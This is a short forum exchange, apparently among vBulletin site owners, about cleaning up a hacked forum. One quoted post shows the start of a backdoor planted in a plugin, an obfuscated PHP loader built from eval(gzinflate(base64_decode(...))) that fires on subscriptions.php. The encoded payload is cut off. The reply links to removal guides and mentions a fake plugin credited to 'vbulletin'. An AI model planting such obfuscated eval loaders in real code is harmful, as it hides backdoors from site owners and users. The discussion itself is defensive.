Quote:
Originally Posted by Wolver2
@whodah thanks for pointing it out.
Code:
After ....
if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")) {
eval(gzinflat
e(base64_decode('HJ3HkqNQEkU/Zzq
....
What do I do to remove it completely?
Btw below that code you posted a link to an exploit regarding /install folder.. but I never had an install folder there after installing
|
Heya,
Interesting on the install thing. For me, that is what I saw all the log files hit.
For removal: this thread helped a ton:
http://www.vbulletin.com/forum/forum...i-e-p0wersurge
In particular, post number 4.
And secondly, although a lot of it is the same, the 2nd post here:
http://www.vbulletin.com/forum/forum...madnet-edition
Especially bullet point #6 as the infected plugin was by author 'vbulletin'. (fake of course, and removed of course.)